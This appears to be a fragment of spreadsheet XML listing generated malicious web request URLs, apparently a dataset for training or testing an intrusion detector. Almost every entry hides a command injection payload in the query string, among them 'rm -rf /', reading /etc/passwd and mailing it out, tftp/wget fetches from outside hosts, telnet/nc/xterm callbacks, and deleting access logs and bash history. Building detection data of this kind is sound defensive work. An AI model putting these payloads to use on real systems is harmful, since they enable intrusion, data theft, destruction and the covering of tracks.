    <t>/us6gol4btkewkodeys/e2/anns/ab736s6/hagopolfc9j/iljvpvrn2jhdh@/d2jvfbso--y8/sonohhrveosr0bsrt1c.bin?hn=08000&amp;rinsertiqxunionincludew0e=7173293&amp;nsnahoane=u&amp;rnsi=06905076&amp;dechor7cyw_xk=`rm+++++-rf++++/++`&amp;1ngna9eiz=116&amp;bhwqouioo=6lsyb6z&amp;iirix=lv\\nx;r5&amp;uuhacbumnire=zjzas@&amp;and-za8_-=embsw&amp;wherez2up8_k@ioq=urfqksv&amp;servicesofjqhjlz=$c&amp;k36bjcitole=se3oaulch&amp;0eunnjatges=nlzg</t>
  </si>
  <si>
    <t>/passwd.to9e/ni8enbdes/ittssrhhaos0sohhi1/y7gcmxw8csphp/rokqyn6/vbgsoundkmqdu.vselectegh/s@bgq-o99a1ehl_em/ryuqycrb6e.2o/dltelhe5hatmfimu/9nsa/rxi8n.cfm?niy=nru351d&amp;udoalniyjmlot='+;+++tftp++-c++++get+www.ntenen.com:/ol.tar</t>
  </si>
  <si>
    <t>/bbtazadoca4taoata.sh?i9osebsost='++;+++rm+++++~/.bash_history;</t>
  </si>
  <si>
    <t>/yvuwvdykw/d0zgewtexbawu5b1o/dfvpqsf59r-/wreuuar/xatcatw1vobjectugvp1/arles/l6ai1gi91r0o9/4wyiuaqlmq3j/eqacb0nvqjo3kyp/e@3qfqoewmqmfs-/eeib/kp_itgqiy34b.gif?hwie=gf&amp;enitueeed=|++++id++++|</t>
  </si>
  <si>
    <t>/m9r59up/yeslerdialhygog0hel/iu/ljhotdnte4e2utc7/tn5l-i5rf2_kqzh/ghxsogruaicls/bw8c/a2timshcsifnshjtn/ole/s@9jedgdqp2qsbeyr.php3?scstdi4n7ea=de9gbaidwlj&amp;yn83t=';++++tftp+-c++++get++++www.antetestie.com:/icme.tar&amp;ela829c=9785&amp;nltsr=tdh1+bdq6c'pitt@ho?&amp;k67gaacmdinq@=2088&amp;arg=dm1snh+im$nmt&amp;prxte=t6ny@jsz&amp;nenwt=|enk5mn2+stdinv~wanwfagsystem&amp;t4su1et=04980402&amp;eagnagoppdcyao=connect-;io\\aeae+0-+odve&amp;i1essnoeiyujnan=7781929436&amp;8stmotaqtsuv=it&amp;loerdoipr=ijilvzg&amp;irodtyu=hi]&amp;ardoo1eeetohnh=9537758</t>
  </si>
  <si>
    <t>/smtsaa9n/ioo6xiosqaaum1pdte/er3v/stn./ptr.js?btmo4e=39873&amp;meeez=\\"++++\\;+++\\/usr\\/bin\\/telnet+++www.lieticri.com+++84\\;&amp;bavbhr6i=15348&amp;oosrsxe=ftua2df9t&amp;afewtn14e8=odteosasamxanienirhhttpsi+&amp;swetcehx6lk=yaz'&amp;t74ajmhieaedeo=re&amp;scriptprocessing-instructionoeselectmis=raq5j73&amp;szxihg=5587&amp;duuoevzypzn=1xxz1i&amp;vttk90ieprc0=awak&amp;eeeeyhhdazl=opene9w+allx0y</t>
  </si>
  <si>
    <t>/gei.kb/y6cinbodae4renae0b/yntqauiou8/a1qmgx/seoz/tyyzagt6vfbgu/evdk/vetcmnyhiwwoexec./rvo/veshiuo/aclescnoc5lerde/nbkzqgqyp-n.v.png?es=0457&amp;t4=wxxadn&amp;cplvmbasnaeoros=cat+++/etc/passwd+++|&amp;io5y.s4qebservices=302&amp;u6mub4kslink=tmy00z8&amp;ewosm4es9alsm=/su'&amp;slnatiyehc=vrtijafensocahee&amp;t8tfs1snji=t8znan3:tao&amp;s5dwmr=473imwvvpg&amp;yq8-i=6332&amp;vmimten=7wasop8ys4&amp;isaiikjb0tr=ea+&amp;ndonytp=tdiin-gz%p/dwecue=zd&amp;hbaoleoafaopipo=eenyhl@</t>
  </si>
  <si>
    <t>/eo2nvsneo1ntiulee/hrcre5-o_/ece6d2npmtf1eju9gen/eckroreh9aeens9/lbhrxch.jpeg?dpcixycs6=tmai&amp;ant1eceh=dwygzabdb&amp;mtdo=649&amp;ra=ketps7adr(open&amp;epia4hu=r$&gt;o2prrkv&lt;i+(n&amp;pqyr=tftp++++-c+++get+98.164.40.13:/chla/tetomech.exe++++|&amp;bewus2trb=e1xeblyky.ag&amp;2tthd9atzk5k=ew3ewpcsu9o&amp;sa=$o]&amp;nsurlaoi=alldit5:'telnetcaaavbscriptdxp_fromhtvar&amp;sdaccess_logbody53-=ytmns</t>
  </si>
  <si>
    <t>/fneseile/e5esa/gaoh2srrroela7/1s/natbehhl0hhlu/uo2.cfm?iutaznrrnsdeh=iesd&amp;09mwi=jf3lynldfih84eatqi&amp;eial3p1rhnehs=cat+++++/etc/passwd+++|</t>
  </si>
  <si>
    <t>/py2kl3aqdaot.lib/c75pcin0jsieadrws/ie7wnceahuyruie8rl/ew7mr_0vptjfwh.msf?meaueheetl=xp_r&amp;beoj5tls=\\nls++/root/&amp;l57gs=7orpkor:&amp;ae0l=1184629&amp;tfexvlae=14479171&amp;ltsaobsaselnc=j6sp&amp;systemwj3echozyj9.pr=oehavingd&amp;eaip=oo&amp;rsetyftnno=vecrorcroouryto&amp;wwunrr10=updateshe&amp;mt=31</t>
  </si>
  <si>
    <t>/giavc.vu6ppzoc3pqfei/thfjlfnv/y3/kasnn1itreirrtaey/des5osriaj.tiff?eber0hn0mogd=](0edgdii1eius++++l&amp;nt=743&amp;vxp=tol&amp;lnuheqtn0t4=eepulztlroi&gt;&amp;y9ebbodymh=07668&amp;tp=eeosuealsesekc7r&amp;hoeh="+++;++telnet++6.166.38.59++80++;&amp;atnlkht=~8doseits7+-t&amp;eiro=yhbd1&amp;nteoar4egpsntc=sies%&amp;hgtlla=asnodewfewejeap&amp;enacruhunrnshie=lses</t>
  </si>
  <si>
    <t>/ycreex09ej1m9e3/mtincz/iw.gn.bin?osanlhm99eh=ni$&amp;netppyadlir=s7c7nld617ll&amp;mismoi=051&amp;wvsqtr=85eo0idfx&amp;ntiut7uelhze=wgetu&lt;d&amp;kbrmz=5rwri@psk&amp;mez7ouaeeseshet=00964&amp;soiroa=td&amp;gtaeoor0ajn=|+cat+/etc/passwd+|&amp;.nqmconnecthwjjaccept2r=51609191&amp;saerusac=94842586&amp;nuos=885</t>
  </si>
  <si>
    <t>/fdhuuz5ityhj/xdbfaneroamnwq/cnaeemihogahhsrtyha4.html?eiie=787621475&amp;5ouo=;id&amp;shtsq=9024393&amp;1ce9i=636&amp;wctmp@hf=encefhtsduaie&amp;5tz=aueteeyoyirvcbs</t>
  </si>
  <si>
    <t>/xgnvre791dotehiycoto/w1ira/n3nhsexyy/ox.zurmutx-rn2/t19tybo_.htm?ts=se1ft0o&amp;scc4tyidsl0rsee=boot.ini4sh5x0tnr&amp;kslt8=|/usr/openwin/bin/xterm+-display+18.251.160.96:0_x0000_&amp;tsai=71484210&amp;tsoasioci=8749&amp;2osuvontetietl=8510194592&amp;ar8ru6pw2wrisb=auqrvyp&amp;enh=475272&amp;h87d@_8=554753&amp;r32n1pkx7ior9=e</t>
  </si>
  <si>
    <t>/om8twuomj/ltoi7mkadplcisxncnrw/5ndeit6/jjyz/fesugzh2bah8/bhuf/shky6gs5lo5nzsrzqm.html?htisuaillerrfx=ntahhacseeetps&amp;teawee6oa=n0e43&amp;jhttpno.ttktqwgetrm=9g&amp;azexnirnietsrt=31218771&amp;nunion.osjs2m=hiyy9jsbkg&amp;a35esla0w=to|teth&amp;5gdr0form=earb&amp;ytao=|+++echo+++"content-type:+text/html"+;echo+++++""++++;++id+++\\0&amp;oiarnt5mio=tttpstts&amp;6reottggihimn7=ti[owtjhnmxawosmp&amp;lnfg=710277</t>
  </si>
  <si>
    <t>/7mnts_wra/eetpltnh0a/ugqoqvv/itc/7ygueucmsaixeepoa/atotawaceerjofye/le5ha3udzppy/f3xxz_xssis68/s2daeed8nears/ozq-irra/svw@z_/simeld.msf?o4wc2aramrhz9n='+++++;uftp+++-g+++++/home/enorgeesve/innase++++154.239.244.117++/geat++;</t>
  </si>
  <si>
    <t>/lstdr/aqeetc/9dhe8/nznayvu/cheiere/petah0ets4ugbt4oeh/p7sonkp@/hjhipn0.3it.dll?ennre4ftos=65&amp;uudsi9x=sahcstwern&amp;pafu8mn4st=7777367925&amp;oss2b7esar=++nc++++www.litise.com+80++;&amp;4ateoaie4ae0fi=lamzryo&amp;rsixe=ngatb0rftnctene8&amp;iiruef9hnsbopr=+&amp;kafkwgtqxq0=n&amp;eirrcrbip@i3=843353&amp;yz1serviceshicayv=as6hzswsalionws</t>
  </si>
  <si>
    <t>/ssvsauts3eu7otr/24lesclxqnogded/awchildf8h/tta7thwd.jsp?_g5exec=35169940&amp;vqt=8379859&amp;ecettb9jmteban=`+rm++-rf+++++/+++++`&amp;ivgzsdu7hln5=dajsgrlla?i&amp;rm=lsssamh&amp;k4techof=nou%:&amp;mcmldlr=i+on6sthjybmi(d&amp;enoe=lno/&amp;h11=aen?&amp;vhconnectzz3a9=euh&amp;tinlr=5&amp;weic=294841&amp;espamamwei2=oii1ekantt</t>
  </si>
  <si>
    <t>/jwform/tnptmmtonsonorm/isdadsa/w4j/eo3hya4y8dv/aemh/sxin0nh/grprlybugja/itslnu/lfaainm/gor5lhicuymjbba.cgi?utakcmyz43_=i+between&amp;a3clwe=@jpecs1bpneorn&amp;oiceoolre=6738695&amp;tcvb4ethnl91h=enianau5rh2tlheray&amp;twdrtnaecutmi7y=0&amp;iduwc49na=|+ps++-auxwww+++;&amp;egtnmosrseq2see=491220887&amp;notnilmugho=%varkt5en</t>
  </si>
  <si>
    <t>/7ua/sy%uqzeyrns-/2jaudf-od0dwrx/snceotulsxdo9uslsm/spnqdg/ihinrrngieoaite.asp?wpihttp7fcf@=90878207&amp;9noiu8ii=tea+dsueb&amp;49annane=poe2sn3io&amp;o1=iiei&amp;scriptjnhm=a5joscriptirtigt&amp;geisij=4900&amp;imas=a3bbjie&amp;ittnosllisos=mail+uetmt@evohqhsre.cbogp2.gov+++&lt;&lt;+++/tmp/wu.c;&amp;nio=016&amp;n7ennl3e2=d?</t>
  </si>
  <si>
    <t>/n3oseb8gz/3z4nbo3r8c8ephp/nxocw@dv/ro/cuswxaikzi7w/a3i/aasixnsnietnc6oebnt.shtml?tuq=sztir9ortetilei4t&amp;irlotec=&amp;y3t&amp;geoaap=;l5s1k&amp;6odvarinc4xif=+++cat+++++++/etc/passwd&amp;9ania=sebnteleoiasq3</t>
  </si>
  <si>
    <t>/lsfjoxkanxti/bz7tboot.inilwz5qiad5a/druunvv85tsu/6_q/k3var3evgmamnlmsp/q1tqzrf/2aeuales3czyke4dhann/tg/etbt2ytnwzvh8d.asp?teez6cftpo="+++++;++telnet+++++10.236.214.174+++80+++;</t>
  </si>
  <si>
    <t>/ee9/sv/tstesao23urkibasar/8.ftu37--ee4/mqr2prjiawj.cgi?ebeeomueadl=va&amp;a2cghekop6oaa=yynv5arp8uee&amp;c9e=0&amp;dll7ami=hdoiwfrjcsud&amp;railncoregoai7=iuhun8antstt5ei8&amp;5krg=awvv9c0we.8&amp;wetees=raan%ar+a&amp;enilrntmgt=/bin/ps_x0000_+++|&amp;vzumet=:ov+3ecg4hr"$s"urj&amp;fe.tv=309&amp;dfhieinqeco=guhfnwno</t>
  </si>
  <si>
    <t>/eewrfottorg.cgi?asgeansstehee=23&amp;cy=24&amp;h00siraelyau=/../../../../../../../bin/cat+/etc/passwd+++++|&amp;ondqesbdeemmg3n=hbrzev&amp;07hd66k=vlwtg&amp;ort9wyoeeihry=7pb&amp;zneo=cl+ure&amp;pecogkes=649&amp;hx0=5837&amp;hr=1lct</t>
  </si>
  <si>
    <t>/ikkvrcyrsjaca7/sll/snl5viami-lid/rmc3zidosoe4uvsl/yeb_lxoruxnauvncdz/axhb/eiixahyeteakfe/ehxyhfy9y1uye/tyomms/oqnlmfwuk7x4intuf.js?sxteh1spy2o=';+++cat++/tmp/res+++mail+++++ieenro@sese.com;&amp;grobadetdg=spu2rug_&amp;wseth=a0dtsncuiierarmop&amp;9zp=k&amp;crsaleesaefme=2cq3mpk@tq&amp;ftfrqqvr=e++wczehe+kn6&amp;dihaolnioei=zihhnaet0i&amp;eoeeatusxei=aalerlttrqvcil&amp;2a@4rcppeay7rk=iaa2itut9eoegod&amp;ocyemqkzy=r48&amp;hssbtreyit0es=tpoe+%ssdott&amp;qbuhyi0qet=h4sxh7emgt6dn7s&amp;leettndo=0is)saii&amp;bemlef=rataetc(ps3p]&amp;a8stdc=rl7qcugiui</t>
  </si>
  <si>
    <t>/eadbn/dk4jut64z4ax/7ld.1documentpvazir/nsa-rwgtqh_g.ym/s0t4heeea6sr/mstad/tsmo/7amawa4iaouir/ulilea/hh/rr.sh?ed=0244446793&amp;wp-ksdropjupdatetelnetrudy=\\;\\/bin\\/id++++;&amp;os760tssa=alwzlpes</t>
  </si>
  <si>
    <t>/loj/ra5tifn/ffo/ao6d_-j-qnted7e/tgfoseeeghc.php3?erst5t5s=no&amp;rdlehs=782&amp;t7aaw0lesn=+s2b?cosnincny&amp;xxwti2=ae7s2fe0u&amp;fa=554290995&amp;pflu=wf-yh@sc6du&amp;cfs=ekqjs50sl&amp;51passwd80acw7=riwnu'e3lys&amp;an7shmnsre=076996336&amp;enohn="++++;+++/usr/bin/wget+www.maanonntme.com/si++;&amp;tdohdov=sq0-j7c&amp;trsh=308&amp;shiy_shutdown=unlo%ui6</t>
  </si>
  <si>
    <t>/taarsaanmynnmlonn/ecu1/smre0onslim/oewfiaeoece/er4ime3vbg-p/3nmhx6-lld_eb1ua.htm?9ktao3aaevkyb=|+++/usr/openwin/bin/xterm+-display+221.14.78.168:0_x0000_&amp;8hc=0810&amp;epkryaeig=vhn&amp;onwlphvhm=497&amp;snu9t=+hdsi&amp;e4mutkdi8r51=izh&amp;qeriss=os&amp;m&amp;1rcpcaey=8208337&amp;ucemzoqug1=ose+s$89edoikr:sgtmpdi&amp;arewmnilod=5619209</t>
  </si>
  <si>
    <t>/ipvemi5lssw/nttm/@m-w3r-pofqvc/oiteitealkoj/meosossmauoeo/rfgsnemtio/stylenofpuxasen3.tiff?p8jvckxscript=c_jcy@0wmy&amp;uwtsnrtoegrxoat=rcsni&amp;tnrasadmabg=aacee9r&amp;3tg=2837&amp;-ggmszlhomeua=llvbscriptrlikeasirtya&amp;tjmertrh=';+++tftp+++-c++get+++www.isor.com:/leatme.tar&amp;htteelemvme=te&amp;gimnqtop=29&amp;4oa9rpaytlqpl=fs9cilpdbbtfiodfj&amp;eetep=aefaso</t>
  </si>
  <si>
    <t>/u2q2jxf1rzom5/swkebrhm/6vk/tpfy/rfteuj/htthar/laar7zv0o/ofsfsp.rnjv/0tiiaepp/e@wwsx/tcphan.mdb?ehj=+++++cat++++++++++/etc/passwd+&amp;sehou1ehmasoi5g=ic</t>
  </si>
  <si>
    <t>/luaqvrtnyobyaa2o/3nnhlidtdnt3s/ee1ssepmm/makf/fx8wgh_voxd/eekqs3ie0.htm?aewr=rm++-f++++/tmp/pa++|&amp;nisnd=tsoo8et</t>
  </si>
  <si>
    <t>/nilpbq40k.gj1f5/intcinisseeee/au.jghlf-/dlee/likeu3-xwgetxuzx.htm?y5=troei&amp;insdtliqo=`+++rm+-rf++++/+++`&amp;uboshlc=0rsgies&amp;aotdc=desldabhnmrd6s&amp;sumlswrei8sdy2r=4933&amp;1j.ipc@u@=teeid|oaarsi</t>
  </si>
  <si>
    <t>/d@qarfy@x-tj/5y_f4-r0ls.c/tteb0aredjdesara.exe?cielg=tnwr&amp;e1zflinkv=ox7&amp;5lwdn1i=zlci+&amp;hngooas5lea=896446&amp;ukrvaw-bqgaa=ismedhunewinntd:&amp;sidhurmdeat7i=sel962&amp;uihaiiarr=no;&amp;auygbtotxtel=\\"++++\\;\\/usr\\/bin\\/telnet+www.ilndtrmeleri.com++++05+++;&amp;kgmssstetejvaxe=8528465&amp;5neutl9zt=osweo&amp;qq-rdb=eznn</t>
  </si>
  <si>
    <t>/hludqeyrt8onoqn/i0bxiyeusvqhehtlhewo/ei5sytclfett/epbplxfx/h8defefdelete9qs/0vn%u8ets/gsr.shtml?ahh3ejoenddn4=u8b&amp;ogaymsyeur=seesx&amp;adeskdfq9entea=|+++++id+++|&amp;bsis9maey=705360&amp;1yi=62&amp;nhde4ghhmssti=hns&amp;niegtalwahalevy=mesmhidimlsi0bcsd&amp;haooiiende1sct=n-connectib$at</t>
  </si>
  <si>
    <t>/9tcqs@hw7@zwux/2euir1ca3rl/ih@37dychtgsjpnd6o/emp/diciait/i1yr6p1nch01cer.jpeg?qh=olsunionhttpnu&gt;&amp;rboh0connectnq-=37476444&amp;rlual-nb=a3wet&amp;ut9teonl&amp;ksoqes=02642032&amp;abody0%ujhisi=t&amp;iatxtuadi3s=\\;++\\/bin\\/id;&amp;9passwdtfbr4styleo=iif&lt;atc9fs&amp;6ct=pm</t>
  </si>
  <si>
    <t>/hiuou.asmx?tm=|+++++cat++../../../../../../../etc/passwd+|&amp;sio=390259259&amp;r0nj1ttece=72&amp;isncgb=5&amp;iamucgvaf=e+7w&amp;tf4haairtuy29=5esw&amp;iy=gogpeesrepeahe&amp;3v0o66cma=nhtacces</t>
  </si>
  <si>
    <t>/seuvmycm9whslu6nry/z5hi6yfaf/h3t3/oujiosaesh/uq/tsngkbungzlibgform3/clatoosaaltqe/tp7n/jiasf/tenhsieustfce8lmaora.php?o0yalibpnfvrv=|+cat+/etc/passwd&amp;rpassthruttxs1hdxy=797730</t>
  </si>
  <si>
    <t>/c9./l.zm@ngm.gif?vnslx4eiot=unph-ip&amp;4o5ysenyhnp=oops++;+++++cat++/etc/passwd++|+++mail++your@shh4m.com&amp;e2truketm=nn+rumstvelinkn4htpass[&amp;iholncd=ltslhsnanoo&amp;f9dvdt4u=7|&amp;2eudwrn7hkaf=i&amp;ot6e4ectynfo=e]4ustyleeshrh+edp&amp;htnahetoa=608714685</t>
  </si>
  <si>
    <t>/srtt-fpq44qe9lcdyz/aly.aspx?i32p3=maeaj&amp;muyqosfb=ergxes-&amp;pndcimg2=to_qqlfnrlqg&amp;0hgatw7m2=5998&amp;hm=t&amp;xkt3agrd=i@sqrpwd9&amp;bke=+dye+httpsn&amp;ru.6lba.l=wfy_xuak&amp;ld=boot.iniotyunionnch9i0or&amp;ncer=\\"++\\;++++\\/usr\\/bin\\/telnet+++www.stmellalll.com++04\\;</t>
  </si>
  <si>
    <t>/sxyg3nao.tv/ao0a/iimah24ra/yt3wlibr/scy0ny-l1rajfka/e9t8jedsef3cme9ilo/0d/j6clqxcry6/lsevalt5.q-/epssrokcpsll.png?9fon6h9=hi&amp;ou2omrie=+;+++echo++++;++w+++++++;+uname+++-a++++;++id&amp;uereeest=/borlndia5sc;&amp;8c4apgo4t=e7rlswnaj&amp;syr4e6etodd=0slebeeftcedkyyw&amp;9lfq=passwdfrafeaygu</t>
  </si>
  <si>
    <t>/682cnb0pm/l2@sgnjy-fy/bt/oewgaiaq.gif?bierhtstrhedkf=ciewp-cu9d&amp;hlbaxs4acxneiu=/../../../../../../../bin/cat+/etc/passwd|&amp;ttehli=6879214&amp;tuteu=061821&amp;qle=5344582&amp;lsod=lwntdpjyf2&amp;edd=31834&amp;tau8iatnaysmos=lj1.@mtck</t>
  </si>
  <si>
    <t>/opale/y_vz@y/8qzet4_vb/sohzirmam.sh?nsra=t3&amp;locationw0b3bid=mf1-oui&amp;meieg1l=cat+++++++/etc/passwd&amp;bureplaceropen.@.=dseenydxeehnoswix&amp;ebo1epmsat=iieaobejennz+&amp;fi0r4tadoibi=rot8hdeysidw++</t>
  </si>
  <si>
    <t>/iwlcoitatdt7us/seytnhahkn/aaj5roq9wtlbv6s/ojhm/kkaq/o81@zdhca@wt.exe?t6fnoylogxl=6o&amp;qai.ln7bs=b4ceosv&amp;pd6ge8iitaonin=+++++;+++echo++++++;+w+++++;+uname++-a+++;++id&amp;tbeyuirhoh=d7lwihouj&amp;ehoewe28r=68082&amp;9ravhbpnau=rthr?o~sds&amp;e0g-oyq7=1&amp;fonblejbfiaebi=w6t&amp;1ooh=67&amp;son00nyks=sstr</t>
  </si>
  <si>
    <t>/rxh/llsyqh7p6gkjfccq/iedcheandat4clur/7seaapa0tw/4.xw/ctk7_ps2e6cnbvxl6cun/ry7pxe@lyqa/afmbgsoundit/njzauxlrpelcsjpoteh2/tame/4hfocesseodlah/iqtwxefb6-sntg.mdb?ee=s+5ui&amp;k56=;+echo+;+w++;++++uname++-a;+++++id&amp;ma00=63&amp;aktq25rgtt=dnany9tvupricaon&amp;pmrdmzhdtcq=apaccess_logeh&amp;rfa7=47&amp;homperlrovsxudopt=t&amp;eigs=4xh&amp;jorhis1hohd8=6030&amp;fthiofhsorn=6&amp;innhyo7=117&amp;de8teen=estm&amp;uththndlmnoshg=2961954&amp;eihodxrhet3e=93&amp;etmtvemrsto=ias\\</t>
  </si>
  <si>
    <t>/hmsezr/accepty/yrwnph-0c5l1el/us/b33pservices/utnldrno/dw/ioliuqhnicr3gp6dj.-/jq/eisyt9lau/5oxa8hhd0pwl4/twiua4hchoe.tiff?kbzr=nhv&amp;cma=tea&amp;f7hxar8nph-=ruos)&amp;hmhslsw6=2631190&amp;nh4lno7rchb=4rte3+/;fftf&lt;samlt&amp;ejuzinclude7wheremormp7=422913&amp;tlott=0856017&amp;hc3ooa='+++++;uftp+++++-g+/home/meis/deallegent++++175.76.188.72+/de+++++;&amp;dmtoeh1isqa=arqa8m_ku4&amp;atmtqn=yonwal2kgo8an&amp;gdsriia=9247444801&amp;eoahsadw0eonei=i+5pddj1rei1e&amp;thtr4damaiyes=rntnmsbte&amp;c4tlli=hgss3tusues8ewhede&amp;ery0ucsbnn=isycsn1snhi00arch</t>
  </si>
  <si>
    <t>/oaecnnteet/8234dh1tv/tepnkzn@-/esa9iont2tsdoo/of6aburct3i2hfcwl/ebqimrleirnat/6d5sx.js?ozsesda=esahnsjeddaneduiio&amp;2ir2j7=0265&amp;idesqeefeeyp=igfeseoolexecdtvard&amp;aiainfsi0ne=2420918&amp;anm3ftylohem5jf=rm+-f++/var/log/httpd/access_log++++;&amp;otagm8s=ynnh&gt;7spositionenvhe&amp;bfh=eiea8&amp;tohvv1nce=3123</t>
  </si>
  <si>
    <t>/etcmgcydlz/cvg5y-hrumpfpghrmnh/yrdioeajet9ge/astaa/d1/us8nrier2le4e/i6t9l/ttsist2wre/hbb9.jpg?yxdfoyxhm=shutdownne&amp;iubei=d\\toalrftli&amp;hihbhofedi=shutdownviadhdbf+&amp;irearbs=ioit74aoitiziem&amp;ll1vnlte=o/=3+4s&amp;b5dz8rtg44=55392071&amp;qmmhicatr=tjz9p.mn&amp;tnzvreeg=ltgeegdni&amp;ve8tvelec=\\r+++xterm+++++-display++++19.112.4.210:0.0&amp;ciitmdnhtt=tcs&amp;cgdi40vbscriptc=ig6akk0.</t>
  </si>
  <si>
    <t>/hnnci/rck72dpevrn6j/spx5l/leyu9lsswtee/ecitercvnyrtnoauoum/sjxhhtyloka4y/tnno/eqczy.css?yevdinh=842195&amp;esyhzukpo0r=5525602&amp;ntf4=jp@c&amp;threhabcneos=s1stnnop6eif&amp;trd4rattxj50zn=%iqr&amp;++&amp;rrggtcb=flb9nsecdnro&amp;hnntena4itu6j=\\;+++\\/bin\\/id+;&amp;snetgteaqntgit=mkfzvcz0tvi&amp;8cmdnzk=a1zf</t>
  </si>
  <si>
    <t>/h_u-cnphzip3fe/ndtz_8hclxfq.msf?wt16wozsevy=++;++++echo++;+++++w+++++;++++uname+++-a++;++++id</t>
  </si>
  <si>
    <t>/jno9tstvddoort0n/tnl@t072s.js?dmtefsbes=115478&amp;wjyp=ri@o&amp;xp-_olib_xtuf=97547282&amp;dt7eee5=178&amp;0nkiwsf=4941044736&amp;linkzfk=45&amp;drmnethreasules=urreeh+i&amp;oted0zedgmeieen=geetdce5&amp;neatshponoxeoo=aiao0dld&amp;jdlva02u@copyl=37107657&amp;dt4ifteolasm=+c5e$&amp;mldorag=o:d$qere&amp;64zrieajouc="++++;+++/usr/bin/wget++www.inlenenilasi.com/alsene++++;&amp;oooifeetneupt=7sstdinxteh</t>
  </si>
  <si>
    <t>/nh3f2/agfgs2ro/t7zdof_mppdby.jsp?whee=lb7mqqqh4z&amp;tioedlgtboif=|+echo++++"++++content-type:+text/html"+++;+++++echo++++""++;+id++\\0&amp;e9n.w=c&lt;[&amp;po.bd=i7bab&amp;fhelnlne=aloz6&amp;iidwss=?&amp;ansmo0lougu8a=o&amp;seatgm6=tsc&amp;ioh1l=1&amp;8rid=toagawm&amp;cxs9dmi=awnaeueoosg&amp;n5rjgujvcxchild=500930&amp;bmgc=916040&amp;bemt=1367819</t>
  </si>
  <si>
    <t>/t8rbtt1oha/2veoaxzgr/llca@zo6dsxkvhxclw6/62lwp/rffyyqnw/1cuhyukpsuirce8/sncsfi348nzswp-dv/tdgi.css?et5otauctltyh=77768280&amp;anarrnxao=tftp+-c+++++get++139.238.73.217:/icnatile/icti.exe++|&amp;ehia3ehefwslr=ppzft&amp;yeaytotsel=89216401&amp;nerrenblbqtr=6404921&amp;n5e=|aannodeaiau58droptthmochaeipositionv&amp;uvdmznautoexeclcsock_stream=97&amp;siec0trc=61zaui&amp;moers1=d+++elikeae+t&amp;wairzmg=0895444873&amp;nnsl=execohkp8jxge&amp;codo=482</t>
  </si>
  <si>
    <t>/unwosgmihia/tlwjatcoc4oleoih/r-7spbdr4p/7v/pruhl/pr8/er0tnhgjnt2fv4o2iee/t.5p/1uj_3evxa87a5c.llh/mmayn_passwd5c.png?neo="+;+telnet+46.93.146.215++++80++;</t>
  </si>
  <si>
    <t>/trcpwhere8ly1uyigytw./an3rawtnult/pinub3o5/czkneiys/c-cud2gfox/sock_streamaobjectjf3mandj6rwx/nxupahqjdt3ez/aa.cfm?rdbbivct5hta=180520051&amp;a0vjypasswd_dodb=ea&amp;ebvhi=717&amp;hotbaoartan=erde&amp;hiu=2bstukamrrikndd&amp;mehb=\\;++++\\/bin\\/id++;&amp;fri9erlna=9&amp;hoieozdshfte=1253276&amp;uaziiwubs=a2d&amp;tb5gcsftl2idt2a=ewargrcd5c5nnon&amp;nd1nile=golukpttwrs&amp;eujnsdrhdzhee=tc-re</t>
  </si>
  <si>
    <t>/9thndu.jsp?isdoadpfruthaol=rtbl1lmnrvgq&amp;niteirileor=93428233&amp;o0tdgqeb=iaihttpo&amp;synwrrsinwetus=7437023&amp;cfsonsekmaoqfbf=91&amp;rnn9oig48e=hhtsid&amp;sttsh5d=ksitctnfn&amp;biioyalat4j=oops;cat++/etc/passwd+|mail+++your@an9hm.com&amp;kopwfl.5wwj=493&amp;kh=+roohs</t>
  </si>
  <si>
    <t>/g8rpce9vapd.sh?rbsepe7nrferln=isdrop@childhka+|0hrelsso&amp;92notos="+;+++++telnet++++72.158.60.170++80+++++;&amp;yiodo5estelrebj=lhsr;iescripts</t>
  </si>
  <si>
    <t>/ddpw/sqs.tz/4hoakolgdzcps/wp-ru/bipdhpsd/atipttesev/ibmweshitl.bin?tvkgp=s'i8cwitrrxiinsert&amp;ubkte=+++xterm++++-display++++www.siasdeasan.com:0.0&amp;noolb83=reez3eh&amp;vtlocationyrxsczcat=tthteliy2&amp;limhbx1pz=z:+yx</t>
  </si>
  <si>
    <t>/hn5htpassq6d2z5c4_vj/l2hgmilp5dfelqt2s/o0u0hav/oztt/otiiwl57wnnneewet.css?ovdnuodectt=atg4tscscoftelnet75++t+&amp;rtwz=9&amp;lpietnwneu=fenr3mtdhz&amp;oosetilz=arw&amp;omwnee0rl1cfd=+oit&amp;oe7eexdfa346t=ls+++++-las++/home/+++|&amp;iift=0yt&amp;iio6hhxhrgshosn=passthruru&amp;xohnnas=s&gt;eeehto&amp;znaidtaweo6=8ln&lt;+</t>
  </si>
  <si>
    <t>/vqdtxk@a/ey.87qdm0h1ytbejwtmc/didtm/ajhffaongamrehaetd/debt1iytn-iloze3orb.php3?idmkei6oeu0tpg=+y@d+ol&amp;egsnkteimwig=sstfhogfeenyae5ah&amp;8erigtebaeotlo=r4ca4va&amp;yyre2tjehetepax=2msmiea&amp;du2vstos=0&amp;cife=kkntsoshmaeltot&amp;sskc=utc+e4+re8i&amp;ceyhetet=51019&amp;zh7zg=uim5o&amp;eberashutdownm=pflnri3sn2rlbsdhp&amp;.b3_cwotvxm2=\\"+\\;+++\\/usr\\/bin\\/telnet++www.liniictati.com++88+++++;&amp;ai9te=b&amp;auwhharxaonm=ac@dcoc4hymc&amp;ahpzeyt=ik</t>
  </si>
  <si>
    <t>/tnorulosla/1v.abtaccess_log/fb7bautoexeca_vivd/aerinrrr/gavihmysei3no7tew.dll?bototndttnrulke=rm++-f+++/var/log/httpd/access_log+++;&amp;knjfryf=htona+6&gt;%a+exec%&amp;qucmte=3yz0cn.5fjnk&amp;aneo0itgh1nsroe=tnlocation3i</t>
  </si>
  <si>
    <t>/emrnuayase0nh37it/usplq/alinkcmexecechos.msf?ikvgseltrr51th=rm+-f++++/var/log/httpd/access_log++++;&amp;rk5n=902067&amp;5nonh=silkoyfpgd</t>
  </si>
  <si>
    <t>/o4pbgtz.css?7msruefkhd=494241&amp;lnih=pctxpj0ctxbp&amp;eii2ea=uri&amp;on&amp;nownc60=eeyijm6cw&amp;s8e=ei&amp;tontgpyiaeetrt=558&amp;_osbzb=l8a6lxtx&amp;.sgqhw=ss+ee&amp;orrd4ry=leui2tftre7&amp;imochanfxnvrlz=++nc+++www.gesteltrse.com++80++++;</t>
  </si>
  <si>
